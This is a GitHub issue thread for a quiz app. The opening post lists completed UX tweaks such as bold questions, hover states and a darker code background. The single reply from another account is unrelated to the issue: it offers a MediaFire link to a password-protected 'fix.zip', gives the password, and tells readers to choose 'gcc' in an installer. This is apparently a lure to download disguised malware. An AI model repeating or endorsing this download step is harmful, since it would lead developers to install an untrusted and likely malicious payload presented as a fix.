### ISSUE TITLE
Improve UX

### ISSUE THREAD

**Issue by dilpreetsio** [Anonysuom/Quiz-App#36]
- [x] Make the questions bold
- [x] Add hover state to buttons and the radio buttons
- [x] Add cursor pointer to buttons
- [x] Make code bg darker for better readability 
- [x] In report handle the case if there is no answer to the question

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
